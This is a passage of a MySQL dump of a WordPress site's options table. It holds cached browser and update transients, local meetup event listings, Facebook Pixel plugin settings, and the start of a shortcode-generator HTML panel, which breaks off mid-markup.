(96240, '_site_transient_browser_959e2b5b923f70cca34ca0f786ddfb9b', 'a:10:{s:4:"name";s:6:"Safari";s:7:"version";s:6:"11.0.1";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:29:"https://www.apple.com/safari/";s:7:"img_src";s:43:"http://s.w.org/images/browsers/safari.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/safari.png?1";s:15:"current_version";s:2:"11";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(108952, '_site_transient_update_themes', 'O:8:"stdClass":4:{s:12:"last_checked";i:1525336194;s:7:"checked";a:6:{s:16:"clearyourbeliefs";s:5:"1.0.0";s:14:"twentyfourteen";s:3:"2.0";s:15:"twentyseventeen";s:3:"1.3";s:13:"twentysixteen";s:3:"1.3";s:14:"twentythirteen";s:3:"2.2";s:12:"twentytwelve";s:3:"2.3";}s:8:"response";a:5:{s:14:"twentyfourteen";a:4:{s:5:"theme";s:14:"twentyfourteen";s:11:"new_version";s:3:"2.1";s:3:"url";s:44:"https://wordpress.org/themes/twentyfourteen/";s:7:"package";s:60:"https://downloads.wordpress.org/theme/twentyfourteen.2.1.zip";}s:15:"twentyseventeen";a:4:{s:5:"theme";s:15:"twentyseventeen";s:11:"new_version";s:3:"1.5";s:3:"url";s:45:"https://wordpress.org/themes/twentyseventeen/";s:7:"package";s:61:"https://downloads.wordpress.org/theme/twentyseventeen.1.5.zip";}s:13:"twentysixteen";a:4:{s:5:"theme";s:13:"twentysixteen";s:11:"new_version";s:3:"1.4";s:3:"url";s:43:"https://wordpress.org/themes/twentysixteen/";s:7:"package";s:59:"https://downloads.wordpress.org/theme/twentysixteen.1.4.zip";}s:14:"twentythirteen";a:4:{s:5:"theme";s:14:"twentythirteen";s:11:"new_version";s:3:"2.3";s:3:"url";s:44:"https://wordpress.org/themes/twentythirteen/";s:7:"package";s:60:"https://downloads.wordpress.org/theme/twentythirteen.2.3.zip";}s:12:"twentytwelve";a:4:{s:5:"theme";s:12:"twentytwelve";s:11:"new_version";s:3:"2.4";s:3:"url";s:42:"https://wordpress.org/themes/twentytwelve/";s:7:"package";s:58:"https://downloads.wordpress.org/theme/twentytwelve.2.4.zip";}}s:12:"translations";a:0:{}}', 'no'),
(96463, '_site_transient_timeout_browser_cb0f25941c7ee58acd15fece4d84c18b', '1513589363', 'no'),
(96464, '_site_transient_browser_cb0f25941c7ee58acd15fece4d84c18b', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:12:"62.0.3202.94";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(105481, 'pys_core', 'a:3:{s:14:"plugin_version";s:5:"1.1.0";s:20:"fb_pixel_pro_enabled";b:1;s:19:"head_footer_enabled";b:1;}', 'yes'),
(97658, '_site_transient_timeout_browser_24b4ef28d88ba7c099658e04e3166d29', '1514319299', 'no'),
(97659, '_site_transient_browser_24b4ef28d88ba7c099658e04e3166d29', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:12:"63.0.3239.84";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(108953, '_site_transient_update_plugins', 'O:8:"stdClass":1:{s:8:"response";a:1:{s:27:"js_composer/js_composer.php";O:8:"stdClass":5:{s:4:"slug";s:11:"js_composer";s:11:"new_version";s:5:"5.4.7";s:3:"url";s:0:"";s:7:"package";b:0;s:4:"name";s:21:"WPBakery Page Builder";}}}', 'no'),
(108878, '_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1525183962', 'no'),
(108879, '_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1525140762', 'no'),
(97992, '_site_transient_timeout_browser_da4804949398f905dcef757ac82cf2c1', '1515267613', 'no'),
(97993, '_site_transient_browser_da4804949398f905dcef757ac82cf2c1', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:12:"63.0.3239.84";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(98187, '_site_transient_timeout_community-events-9f620fdb3db30843a255c0f8eddffe7d', '1515221327', 'no'),
(98188, '_site_transient_community-events-9f620fdb3db30843a255c0f8eddffe7d', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"67.102.114.0";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:75:"Plan your work: Using Mockup Tools with Balsamiq (NOTE: Jan. 8, not Jan. 1)";s:3:"url";s:50:"https://www.meetup.com/sanjosewp/events/245419844/";s:6:"meetup";s:29:"The San Jose WordPress Meetup";s:10:"meetup_url";s:33:"https://www.meetup.com/sanjosewp/";s:4:"date";s:19:"2018-01-08 17:30:00";s:8:"location";a:4:{s:8:"location";s:17:"San Jose, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.244194;s:9:"longitude";d:-121.889313;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:67:"How Blocks, Views, and Gutenberg might change the future of the web";s:3:"url";s:59:"https://www.meetup.com/WordPress-Monterey/events/246330715/";s:6:"meetup";s:18:"WordPress Monterey";s:10:"meetup_url";s:42:"https://www.meetup.com/WordPress-Monterey/";s:4:"date";s:19:"2018-01-18 18:00:00";s:8:"location";a:4:{s:8:"location";s:17:"Monterey, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:36.585442;s:9:"longitude";d:-121.852631;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:77:"Set It and Forget It: Structured Content in WordPress with the Pods Framework";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/245139111/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2018-01-21 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:48:"Plan your work: Using Mockup Tools with Balsamiq";s:3:"url";s:72:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/245522653/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2018-01-31 13:30:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:74:"SlickPlan – Graphical Planning Tool for Website Layouts and Organization";s:3:"url";s:50:"https://www.meetup.com/sanjosewp/events/246487523/";s:6:"meetup";s:29:"The San Jose WordPress Meetup";s:10:"meetup_url";s:33:"https://www.meetup.com/sanjosewp/";s:4:"date";s:19:"2018-02-05 17:30:00";s:8:"location";a:4:{s:8:"location";s:17:"San Jose, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.244194;s:9:"longitude";d:-121.889313;}}}}', 'no'),
(99945, '_site_transient_timeout_browser_ef079ae9e3e2e75b3a050be337045e11', '1518486100', 'no'),
(99946, '_site_transient_browser_ef079ae9e3e2e75b3a050be337045e11', 'a:10:{s:4:"name";s:6:"Safari";s:7:"version";s:6:"11.0.2";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:29:"https://www.apple.com/safari/";s:7:"img_src";s:43:"http://s.w.org/images/browsers/safari.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/safari.png?1";s:15:"current_version";s:2:"11";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(99609, '_site_transient_timeout_browser_b876c8fd7fc402e60530b64622320f7a', '1517764056', 'no'),
(99610, '_site_transient_browser_b876c8fd7fc402e60530b64622320f7a', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:13:"63.0.3239.132";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(100137, '_site_transient_timeout_community-events-3cfdace2e6263ec01a127bd1846a6c82', '1518267048', 'no'),
(100138, '_site_transient_community-events-3cfdace2e6263ec01a127bd1846a6c82', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:20:"2601:204:c102:3040::";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:49:"Women of WordPress NYC (WoWPNYC) Networking Event";s:3:"url";s:53:"https://www.meetup.com/WordPressNYC/events/247360358/";s:6:"meetup";s:26:"WordPress NYC Meetup Group";s:10:"meetup_url";s:36:"https://www.meetup.com/WordPressNYC/";s:4:"date";s:19:"2018-02-08 18:00:00";s:8:"location";a:4:{s:8:"location";s:17:"New York, NY, USA";s:7:"country";s:2:"us";s:8:"latitude";d:40.755104000000003;s:9:"longitude";d:-73.986205999999996;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:51:"Web Design, Video, and Digital Storytelling, Oh My!";s:3:"url";s:71:"https://www.meetup.com/Lehigh-Valley-WordPress-Meetup/events/246934353/";s:6:"meetup";s:30:"Lehigh Valley WordPress Meetup";s:10:"meetup_url";s:54:"https://www.meetup.com/Lehigh-Valley-WordPress-Meetup/";s:4:"date";s:19:"2018-02-08 19:00:00";s:8:"location";a:4:{s:8:"location";s:18:"Allentown, PA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:40.601078000000001;s:9:"longitude";d:-75.474999999999994;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:67:"Help Desk - Bring Your Laptop, Yourself and Your WordPress Problems";s:3:"url";s:70:"https://www.meetup.com/WordPress-North-Jersey-Meetup/events/245539665/";s:6:"meetup";s:29:"WordPress North Jersey Meetup";s:10:"meetup_url";s:53:"https://www.meetup.com/WordPress-North-Jersey-Meetup/";s:4:"date";s:19:"2018-02-12 19:00:00";s:8:"location";a:4:{s:8:"location";s:14:"Montclair, USA";s:7:"country";s:2:"US";s:8:"latitude";d:40.811279999999996;s:9:"longitude";d:-74.219345000000004;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:67:"Help Desk - Bring Your Laptop, Yourself and Your WordPress Problems";s:3:"url";s:70:"https://www.meetup.com/WordPress-North-Jersey-Meetup/events/245539665/";s:6:"meetup";s:29:"WordPress North Jersey Meetup";s:10:"meetup_url";s:53:"https://www.meetup.com/WordPress-North-Jersey-Meetup/";s:4:"date";s:19:"2018-02-12 19:00:00";s:8:"location";a:4:{s:8:"location";s:14:"Montclair, USA";s:7:"country";s:2:"US";s:8:"latitude";d:40.811279999999996;s:9:"longitude";d:-74.219345000000004;}}i:4;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:22:"WordCamp Lancaster, PA";s:3:"url";s:37:"https://2018.lancasterpa.wordcamp.org";s:6:"meetup";N;s:10:"meetup_url";N;s:4:"date";s:19:"2018-03-03 00:00:00";s:8:"location";a:4:{s:8:"location";s:13:"Lancaster, PA";s:7:"country";s:2:"US";s:8:"latitude";d:40.054489500000003;s:9:"longitude";d:-76.282538299999999;}}}}', 'no'),
(100696, '_site_transient_timeout_community-events-0f5fbf3c0ef19871304abdde68e9edf7', '1519306234', 'no'),
(100697, '_site_transient_community-events-0f5fbf3c0ef19871304abdde68e9edf7', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:10:"24.5.161.0";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:59:"Useful WordPress Configuration Tricks That You May Not Know";s:3:"url";s:72:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/247411595/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2018-02-28 13:00:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:63:"Stop Guessing: Diagnosing & Fixing WordPress Server Performance";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/246250687/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2018-03-18 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:71:"SlickPlan- Graphical Planning Tool for Website Layouts and Organization";s:3:"url";s:72:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/246468804/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2018-03-28 13:00:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:3:"TBD";s:3:"url";s:75:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/dztqzlyxfblc/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2018-03-28 13:30:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:40:"All about Gutenberg with Karla Leibowitz";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/247124302/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2018-04-15 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}}}', 'no'),
(105475, '_site_transient_browser_49da57eac7f840522fef2b86e883cffa', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:13:"64.0.3282.186";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(108188, '_site_transient_timeout_browser_231067d56394223babc9d7439bc32e9f', '1523858612', 'no'),
(108189, '_site_transient_browser_231067d56394223babc9d7439bc32e9f', 'a:10:{s:4:"name";s:6:"Safari";s:7:"version";s:6:"11.0.3";s:8:"platform";s:9:"Macintosh";s:10:"update_url";s:29:"https://www.apple.com/safari/";s:7:"img_src";s:43:"http://s.w.org/images/browsers/safari.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/safari.png?1";s:15:"current_version";s:2:"11";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(105480, 'pys_fb_pixel_version', '6.4.2', 'yes'),
(105484, 'pys_fb_pixel_pro', 'a:110:{s:11:"license_key";s:32:"6e6cf663de68cfcc3d3ccd43354c193a";s:14:"license_status";s:5:"valid";s:15:"license_expires";s:10:"1552607999";s:8:"pixel_id";s:0:"";s:9:"in_footer";b:0;s:11:"woo_enabled";b:0;s:11:"edd_enabled";b:0;s:28:"track_traffic_source_enabled";b:1;s:24:"advance_matching_enabled";b:1;s:19:"click_event_enabled";b:1;s:15:"youtube_enabled";b:1;s:13:"vimeo_enabled";b:1;s:15:"adsense_enabled";b:1;s:21:"general_event_enabled";b:1;s:18:"general_event_name";s:12:"GeneralEvent";s:19:"general_event_delay";s:0:"";s:30:"general_event_on_posts_enabled";b:1;s:30:"general_event_on_pages_enabled";b:1;s:28:"general_event_on_tax_enabled";b:1;s:28:"general_event_on_woo_enabled";b:1;s:28:"general_event_on_edd_enabled";b:1;s:20:"search_event_enabled";b:1;s:14:"events_enabled";b:1;s:14:"woo_content_id";s:10:"product_id";s:16:"woo_product_data";s:9:"variation";s:21:"woo_content_id_prefix";s:0:"";s:21:"woo_content_id_suffix";s:0:"";s:15:"woo_event_value";s:5:"price";s:14:"woo_tax_option";s:8:"included";s:19:"woo_shipping_option";s:8:"included";s:26:"woo_track_custom_audiences";b:1;s:26:"woo_lifetime_value_enabled";b:1;s:33:"woo_lifetime_value_order_statuses";a:4:{i:0;s:10:"wc-pending";i:1;s:13:"wc-processing";i:2;s:10:"wc-on-hold";i:3;s:12:"wc-completed";}s:35:"woo_customers_export_order_statuses";a:4:{i:0;s:10:"wc-pending";i:1;s:13:"wc-processing";i:2;s:10:"wc-on-hold";i:3;s:12:"wc-completed";}s:24:"woo_view_content_enabled";b:1;s:22:"woo_view_content_delay";s:0:"";s:30:"woo_view_content_value_enabled";b:0;s:29:"woo_view_content_value_option";s:5:"price";s:30:"woo_view_content_value_percent";s:0:"";s:29:"woo_view_content_value_global";s:0:"";s:25:"woo_view_category_enabled";b:1;s:27:"woo_add_to_cart_btn_enabled";b:1;s:28:"woo_add_to_cart_page_enabled";b:0;s:32:"woo_add_to_cart_checkout_enabled";b:0;s:29:"woo_add_to_cart_value_enabled";b:0;s:28:"woo_add_to_cart_value_option";s:5:"price";s:29:"woo_add_to_cart_value_percent";s:0:"";s:28:"woo_add_to_cart_value_global";s:0:"";s:29:"woo_initiate_checkout_enabled";b:1;s:35:"woo_initiate_checkout_value_enabled";b:0;s:34:"woo_initiate_checkout_value_option";s:5:"price";s:35:"woo_initiate_checkout_value_percent";s:0:"";s:34:"woo_initiate_checkout_value_global";s:0:"";s:20:"woo_purchase_enabled";b:1;s:27:"woo_purchase_on_transaction";b:1;s:25:"woo_purchase_value_option";s:5:"price";s:26:"woo_purchase_value_percent";s:0:"";s:25:"woo_purchase_value_global";s:0:"";s:24:"woo_purchase_add_address";b:1;s:31:"woo_purchase_add_payment_method";b:1;s:32:"woo_purchase_add_shipping_method";b:1;s:24:"woo_purchase_add_coupons";b:1;s:21:"woo_affiliate_enabled";b:0;s:24:"woo_affiliate_event_type";s:4:"Lead";s:31:"woo_affiliate_custom_event_type";s:0:"";s:27:"woo_affiliate_value_enabled";b:0;s:26:"woo_affiliate_value_option";s:5:"price";s:26:"woo_affiliate_value_global";s:0:"";s:18:"woo_paypal_enabled";b:0;s:21:"woo_paypal_event_type";s:14:"AddPaymentInfo";s:28:"woo_paypal_custom_event_type";s:0:"";s:24:"woo_paypal_value_enabled";b:0;s:23:"woo_paypal_value_option";s:5:"price";s:23:"woo_paypal_value_global";s:0:"";s:14:"edd_content_id";s:11:"download_id";s:21:"edd_content_id_prefix";s:0:"";s:21:"edd_content_id_suffix";s:0:"";s:15:"edd_event_value";s:5:"price";s:26:"edd_track_custom_audiences";b:1;s:14:"edd_tax_option";s:8:"included";s:26:"edd_lifetime_value_enabled";b:1;s:33:"edd_lifetime_value_order_statuses";a:1:{i:0;s:7:"publish";}s:35:"edd_customers_export_order_statuses";a:1:{i:0;s:7:"publish";}s:24:"edd_view_content_enabled";b:1;s:22:"edd_view_content_delay";N;s:30:"edd_view_content_value_enabled";b:0;s:29:"edd_view_content_value_option";s:5:"price";s:30:"edd_view_content_value_percent";s:0:"";s:29:"edd_view_content_value_global";s:0:"";s:25:"edd_view_category_enabled";b:1;s:27:"edd_add_to_cart_btn_enabled";b:1;s:32:"edd_add_to_cart_checkout_enabled";b:0;s:29:"edd_add_to_cart_value_enabled";b:0;s:28:"edd_add_to_cart_value_option";s:5:"price";s:29:"edd_add_to_cart_value_percent";s:0:"";s:28:"edd_add_to_cart_value_global";s:0:"";s:29:"edd_initiate_checkout_enabled";b:1;s:35:"edd_initiate_checkout_value_enabled";b:0;s:34:"edd_initiate_checkout_value_option";s:5:"price";s:35:"edd_initiate_checkout_value_percent";s:0:"";s:34:"edd_initiate_checkout_value_global";s:0:"";s:20:"edd_purchase_enabled";b:1;s:27:"edd_purchase_on_transaction";b:1;s:26:"edd_purchase_value_enabled";b:1;s:25:"edd_purchase_value_option";s:5:"price";s:26:"edd_purchase_value_percent";s:0:"";s:25:"edd_purchase_value_global";s:0:"";s:24:"edd_purchase_add_address";b:1;s:31:"edd_purchase_add_payment_method";b:1;s:24:"edd_purchase_add_coupons";b:1;}', 'yes'),
(108887, '_transient_timeout_su/generator/popup', '1525313580', 'no');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(108888, '_transient_su/generator/popup', '		<div id="su-generator-wrap" style="display:none">\r\n			<div id="su-generator">\r\n				<div id="su-generator-header">\r\n					<div id="su-generator-tools"><a href="http://clearyourbeliefs.com/wp-admin/admin.php?page=shortcodes-ultimate#tab-1" target="_blank" title="Settings">Plugin settings</a> <span></span> <a href="http://gndev.info/shortcodes-ultimate/" target="_blank" title="Plugin homepage">Plugin homepage</a> <span></span> <a href="http://wordpress.org/support/plugin/shortcodes-ultimate/" target="_blank" title="Support forums">Support forums</a> <span></span> <a href="http://clearyourbeliefs.com/wp-admin/admin.php?page=shortcodes-ultimate-addons" target="_blank" title="Add-ons" class="su-add-ons">Add-ons</a></div>\r\n					<input type="text" name="su_generator_search" id="su-generator-search" value="" placeholder="Search for shortcodes" />\r\n					<div id="su-generator-filter">\r\n						<strong>Filter by type</strong>\r\n						<a href="#" data-filter="all">All</a><a href="#" data-filter="content">Content</a><a href="#" data-filter="box">Box</a><a href="#" data-filter="media">Media</a><a href="#" data-filter="gallery">Gallery</a><a href="#" data-filter="data">Data</a><a href="#" data-filter="other">Other</a>					</div>\r\n					<div id="su-generator-choices" class="su-generator-clearfix">\r\n						<span data-name="Heading" data-shortcode="heading" title="Styled heading" data-desc="Styled heading" data-group="content"><i class="fa fa-h-square"></i>Heading</span>\n<span data-name="Tabs" data-shortcode="tabs" title="Tabs container" data-desc="Tabs container" data-group="box"><i class="fa fa-list-alt"></i>Tabs</span>\n<span data-name="Tab" data-shortcode="tab" title="Single tab" data-desc="Single tab" data-group="box"><i class="fa fa-list-alt"></i>Tab</span>\n<span data-name="Spoiler" data-shortcode="spoiler" title="Spoiler with hidden content" data-desc="Spoiler with hidden content" data-group="box"><i class="fa fa-list-ul"></i>Spoiler</span>\n<span data-name="Accordion" data-shortcode="accordion" title="Accordion with spoilers" data-desc="Accordion with spoilers" data-group="box"><i class="fa fa-list"></i>Accordion</span>\n<span data-name="Divider" data-shortcode="divider" title="Content divider with optional TOP link" data-desc="Content divider with optional TOP link" data-group="content"><i class="fa fa-ellipsis-h"></i>Divider</span>\n<span data-name="Spacer" data-shortcode="spacer" title="Empty space with adjustable height" data-desc="Empty space with adjustable height" data-group="content other"><i class="fa fa-arrows-v"></i>Spacer</span>\n<span data-name="Highlight" data-shortcode="highlight" title="Highlighted text" data-desc="Highlighted text" data-group="content"><i class="fa fa-pencil"></i>Highlight</span>\n<span data-name="Label" data-shortcode="label" title="Styled label" data-desc="Styled label" data-group="content"><i class="fa fa-tag"></i>Label</span>\n<span data-name="Quote" data-shortcode="quote" title="Blockquote alternative" data-desc="Blockquote alternative" data-group="box"><i class="fa fa-quote-right"></i>Quote</span>\n<span data-name="Pullquote" data-shortcode="pullquote" title="Pullquote" data-desc="Pullquote" data-group="box"><i class="fa fa-quote-left"></i>Pullquote</span>\n<span data-name="Dropcap" data-shortcode="dropcap" title="Dropcap" data-desc="Dropcap" data-group="content"><i class="fa fa-bold"></i>Dropcap</span>\n<span data-name="Frame" data-shortcode="frame" title="Styled image frame" data-desc="Styled image frame" data-group="content"><i class="fa fa-picture-o"></i>Frame</span>\n<span data-name="Row" data-shortcode="row" title="Row for flexible columns" data-desc="Row for flexible columns" data-group="box"><i class="fa fa-columns"></i>Row</span>\n<span data-name="Column" data-shortcode="column" title="Flexible and responsive columns" data-desc="Flexible and responsive columns" data-group="box"><i class="fa fa-columns"></i>Column</span>\n<span data-name="List" data-shortcode="list" title="Styled unordered list" data-desc="Styled unordered list" data-group="content"><i class="fa fa-list-ol"></i>List</span>\n<span data-name="Button" data-shortcode="button" title="Styled button" data-desc="Styled button" data-group="content"><i class="fa fa-heart"></i>Button</span>\n<span data-name="Service" data-shortcode="service" title="Service box with title" data-desc="Service box with title" data-group="box"><i class="fa fa-check-square-o"></i>Service</span>\n<span data-name="Box" data-shortcode="box" title="Colored box with caption" data-desc="Colored box with caption" data-group="box"><i class="fa fa-list-alt"></i>Box</span>\n<span data-name="Note" data-shortcode="note" title="Colored box" data-desc="Colored box" data-group="box"><i class="fa fa-list-alt"></i>Note</span>\n<span data-name="Expand" data-shortcode="expand" title="Expandable text block" data-desc="Expandable text block" data-group="box"><i class="fa fa-sort-amount-asc"></i>Expand</span>\n<span data-name="Lightbox" data-shortcode="lightbox" title="Lightbox window with custom content" data-desc="Lightbox window with custom content" data-group="gallery"><i class="fa fa-external-link"></i>Lightbox</span>\n<span data-name="Lightbox content" data-shortcode="lightbox_content" title="Inline content for lightbox" data-desc="Inline content for lightbox" data-group="gallery"><i class="fa fa-external-link"></i>Lightbox content</span>\n<span data-name="Tooltip" data-shortcode="tooltip" title="Tooltip window with custom content" data-desc="Tooltip window with custom content" data-group="other"><i class="fa fa-comment-o"></i>Tooltip</span>\n<span data-name="Private" data-shortcode="private" title="Private note for post authors" data-desc="Private note for post authors" data-group="other"><i class="fa fa-lock"></i>Private</span>\n<span data-name="YouTube" data-shortcode="youtube" title="YouTube video" data-desc="YouTube video" data-group="media"><i class="fa fa-youtube-play"></i>YouTube</span>\n<span data-name="YouTube Advanced" data-shortcode="youtube_advanced" title="YouTube video player with advanced settings" data-desc="YouTube video player with advanced settings" data-group="media"><i class="fa fa-youtube-play"></i>YouTube Advanced</span>\n<span data-name="Vimeo" data-shortcode="vimeo" title="Vimeo video" data-desc="Vimeo video" data-group="media"><i class="fa fa-youtube-play"></i>Vimeo</span>\n<span data-name="Screenr" data-shortcode="screenr" title="Screenr video" data-desc="Screenr video" data-group="media"><i class="fa fa-youtube-play"></i>Screenr</span>\n<span data-name="Dailymotion" data-shortcode="dailymotion" title="Dailymotion video" data-desc="Dailymotion video" data-group="media"><i class="fa fa-youtube-play"></i>Dailymotion</span>\n<span data-name="Audio" data-shortcode="audio" title="Custom audio player" data-desc="Custom audio player" data-group="media"><i class="fa fa-play-circle"></i>Audio</span>\n<span data-name="Video" data-shortcode="video" title="Custom video player" data-desc="Custom video player" data-group="media"><i class="fa fa-play-circle"></i>Video</span>\n<span data-name="Table" data-shortcode="table" title="Styled table from HTML or CSV file" data-desc="Styled table from HTML or CSV file" data-group="content"><i class="fa fa-table"></i>Table</span>\n<span data-name="Permalink" data-shortcode="permalink" title="Permalink to specified post/page" data-desc="Permalink to specified post/page" data-group="content other"><i class="fa fa-link"></i>Permalink</span>\n<span data-name="Members" data-shortcode="members" title="Content for logged in members only" data-desc="Content for logged in members only" data-group="other"><i class="fa fa-lock"></i>Members</span>\n<span data-name="Guests" data-shortcode="guests" title="Content for guests only" data-desc="Content for guests only" data-group="other"><i class="fa fa-user"></i>Guests</span>\n<span data-name="RSS Feed" data-shortcode="feed" title="Feed grabber" data-desc="Feed grabber" data-group="content other"><i class="fa fa-rss"></i>RSS Feed</span>\n<span data-name="Menu" data-shortcode="menu" title="Custom menu by name" data-desc="Custom menu by name" data-group="other"><i class="fa fa-bars"></i>Menu</span>\n<span data-name="Sub pages" data-shortcode="subpages" title="List of sub pages" data-desc="List of sub pages" data-group="other"><i class="fa fa-bars"></i>Sub pages</span>\n<span data-name="Siblings" data-shortcode="siblings" title="List of cureent page siblings" data-desc="List of cureent page siblings" data-group="other"><i class="fa fa-bars"></i>Siblings</span>\n<span data-name="Document" data-shortcode="document" title="Document viewer by Google" data-desc="Document viewer by Google" data-group="media"><i class="fa fa-file-text"></i>Document</span>\n<span data-name="Gmap" data-shortcode="gmap" title="Maps by Google" data-desc="Maps by Google" data-group="media"><i class="fa fa-globe"></i>Gmap</span>\n<span data-name="Slider" data-shortcode="slider" title="Customizable image slider" data-desc="Customizable image slider" data-group="gallery"><i 